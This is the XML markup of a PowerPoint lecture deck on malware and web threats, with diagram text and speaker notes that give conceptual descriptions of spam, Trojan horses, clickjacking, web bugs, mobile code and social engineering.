    <dgm:cxn modelId="{4F191845-E80E-894F-854A-E53BE6E53E2E}" type="presParOf" srcId="{7E6DECE1-D6A6-5D4D-A078-A335445B66E4}" destId="{DBE981F0-CF9E-D04D-8782-2679CEAFE878}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{EC1931DE-D626-E444-AC2F-2D82B592F04F}" type="presParOf" srcId="{DBE981F0-CF9E-D04D-8782-2679CEAFE878}" destId="{C8375C9C-C22E-4441-BF7D-39B9C69C123B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F324AEBA-A834-E245-AFE7-A548C0102403}" type="presParOf" srcId="{DBE981F0-CF9E-D04D-8782-2679CEAFE878}" destId="{F51487FA-4B78-3143-AB57-C253994AA440}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{522ABD93-AD98-4441-A499-3FDDDF65FA7E}" type="presParOf" srcId="{DBE981F0-CF9E-D04D-8782-2679CEAFE878}" destId="{4453455A-2854-964D-B616-448291BE042A}" srcOrd="2"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349" y="0"/>
          <a:ext cx="3508374" cy="6105031"/>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Spam</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1349" y="0"/>
        <a:ext cx="3508374" cy="1831509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3FF2CAA5-6E7F-EF4C-9B02-6A90DD359AF1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="352186" y="1832030"/>
          <a:ext cx="2806700" cy="1199394"/>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Unsolicited bulk</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="1022350">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2300" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t> e-mail</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="387315" y="1867159"/>
        <a:ext cx="2736442" cy="1129136"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6FE50D95-AA55-4744-8640-B2B3540673C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="352186" y="3215947"/>
          <a:ext cx="2806700" cy="1199394"/>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Significant carrier of malware</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="387315" y="3251076"/>
        <a:ext cx="2736442" cy="1129136"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{46CCBB17-C841-654B-B78D-27845626891C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="352186" y="4599863"/>
          <a:ext cx="2806700" cy="1199394"/>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Used for phishing attacks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="387315" y="4634992"/>
        <a:ext cx="2736442" cy="1129136"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0FB8B290-EEEC-0C47-9F93-05681CD27AC2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3772852" y="0"/>
          <a:ext cx="3508374" cy="6105031"/>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Trojan horse</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3772852" y="0"/>
        <a:ext cx="3508374" cy="1831509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8D1AB2C6-C8C2-264A-AB94-906857099761}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4123690" y="1833297"/>
          <a:ext cx="2806700" cy="1840750"/>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Program or utility containing harmful hidden code</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4177604" y="1887211"/>
        <a:ext cx="2698872" cy="1732922"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CA0D8F73-6837-6D4C-846D-34586ACB84FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4123690" y="3957240"/>
          <a:ext cx="2806700" cy="1840750"/>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Used to accomplish functions that the attacker could not accomplish directly</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4177604" y="4011154"/>
        <a:ext cx="2698872" cy="1732922"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E3CD1909-82DC-5245-8C0A-079E52A0B644}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7544355" y="0"/>
          <a:ext cx="3508374" cy="6105031"/>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Mobile phone </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>trojans</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7544355" y="0"/>
        <a:ext cx="3508374" cy="1831509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C8375C9C-C22E-4441-BF7D-39B9C69C123B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7895193" y="1833297"/>
          <a:ext cx="2806700" cy="1840750"/>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First appeared in 2004 (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" b="0" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Skuller</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7949107" y="1887211"/>
        <a:ext cx="2698872" cy="1732922"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4453455A-2854-964D-B616-448291BE042A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7895193" y="3957240"/>
          <a:ext cx="2806700" cy="1840750"/>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b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Target is the smartphone</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7949107" y="4011154"/>
        <a:ext cx="2698872" cy="17329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1A3662-5352-0F4B-ADD3-64B157A5A5AB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/25/16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AF8BA5-29F8-454F-937A-442773DBB7C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25137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Shape 3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8" name="Shape 3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546515555"/>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xfrm>
            <a:off x="4144963" y="9121775"/>
            <a:ext cx="3170237"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charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="966788">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="966788">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fld id="{D2291CA7-6E01-074B-9649-355986D670A9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="13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239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CAPTCHAs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are used by websites to defeat automation, such as by preventing spammers from scripting the creation of massive numbers of email accounts. By using dummy websites to entice users into solving CAPTCHAs, attackers can effectively defeat the CAPTCHAs at scale.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35409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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> examples of these mechanisms are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SecurID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> tokens, Google Authenticator, and text message codes. Driver signing is an example of using such techniques to mitigate local malware.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41602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fake banking website meant to trick users.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8795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a software download site meant to trick users into downloading malicious applications.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131263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tiny image served up from one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>provider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ClicksRUs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>”) that allows user behavior to be tracked across many sites for advertising purposes. Students probably notice this when they see web ads that offer up items very similar to ones they’ve recently been shopping for on other sites. Web bugs can also be used to track users’ reading of advertising emails.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74661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Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a way of tricking users into providing desired input. The attacker makes the input dialog transparent and places an image with an enticement below the transparent dialog. The user ends up answering a question he didn’t even know he was being asked, unknowingly authorizing his computer to execute the attacker’s will. “Framing”—moving and layering HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>—is an important component of this attack.</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1790361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Unwanted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rowser toolbars are an example that just about every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> student will have had experience with.</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48978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222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APT is a special type of threat that has only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> been taken seriously by the broad security community over the past decade. In general, security experts believe that no one who becomes a high-priority target can truly be safe from APT.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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194719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attacker types is associated with a different set of resources,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> capabilities, and motivations. Understanding the different types will help later in considering threats.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4CA7DEB1-D7C8-3B49-8A71-75AFCE089D88}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153427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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Mobile code refers to programs (e.g., script, macro, or other portable instruction)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>that can be shipped unchanged to a heterogeneous collection of platforms and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>execute with identical semantics [JANS08].</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Mobile code is transmitted from a remote system to a local system and then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>executed on the local system without the user’s explicit instruction [SOUP13]. Mobile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>code often acts as a mechanism for a virus, worm, or Trojan horse to be transmitted to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>the user’s workstation. In other cases, mobile code takes advantage of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>to perform its own exploits, such as unauthorized data access or root compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Popular vehicles for mobile code include Java applets, ActiveX, JavaScript, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>VBScript. The most common ways of using mobile code for malicious operations on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>local system are cross-site scripting, interactive and dynamic Web sites, e-mail attachments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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xfrm>
            <a:off x="3884613" y="8685213"/>
            <a:ext cx="2971800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{353A8A23-2EEF-4597-A988-F86389022732}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1132515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bydownload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and is vulnerable to the exploits used. Watering-hole attacks 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remaining undetected.</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Klez</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sz="1100" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61444" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8685213"/>
            <a:ext cx="2971800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6A1CD6A7-873F-4FC7-AA31-DFA155F764A4}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395557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known as a user-interface  (UI) redress attack , is a vulnerability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2EF01EA8-8A05-4B44-9488-279E78AAD254}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="697208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smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>The final category of malware propagation we consider involves social engineering,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>“tricking” users to assist in the compromise of their own systems or personal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>information. This can occur when a user views and responds to some SPAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>e-mail, or permits the installation and execution of some Trojan horse program or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>scripting code.</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Spam (Unsolicited Bulk) E-Mail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With the explosive growth of the Internet over the last few decades, the widespread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>use of e-mail, and the extremely low cost required to send large volumes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>of e-mail, has come the rise of unsolicited bulk e-mail, commonly known as spam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>A number of recent estimates suggest that spam e-mail may account for 90% or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>more of all e-mail sent. This imposes significant costs on both the network infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>needed to relay this traffic, and on users who need to filter their legitimate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>e-mails out of this flood. In response to this explosive growth, there has been the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>equally rapid growth of the anti-spam industry that provides products to detect and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>filter spam e-mails. This has led to an arms race between the spammers devising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>techniques to sneak their content through, and with the defenders efforts to block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>them [KREI09].</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recent years, the volume of spam e-mail has started to decline. One reason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the rapid growth of attacks, including spam, spread via social media networks.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reflects the rapid growth in use of these networks, which form a new arena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attackers to exploit [SYMA13].</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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
